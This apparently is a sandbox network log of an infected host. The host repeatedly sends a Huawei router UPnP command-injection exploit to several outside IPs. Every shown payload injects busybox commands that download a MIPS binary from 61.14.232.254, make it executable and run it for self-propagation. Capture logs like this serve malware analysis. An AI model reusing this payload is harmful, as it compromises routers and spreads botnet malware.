                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2249192.168.2.1353872201.37.110.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.745240927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.030628920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.490677118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2250192.168.2.1345866157.39.23.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.745291948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.030628920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.490677118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2251192.168.2.134715489.127.7.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.745312929 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.030689001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.490664959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2252192.168.2.1344278157.44.237.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.745353937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
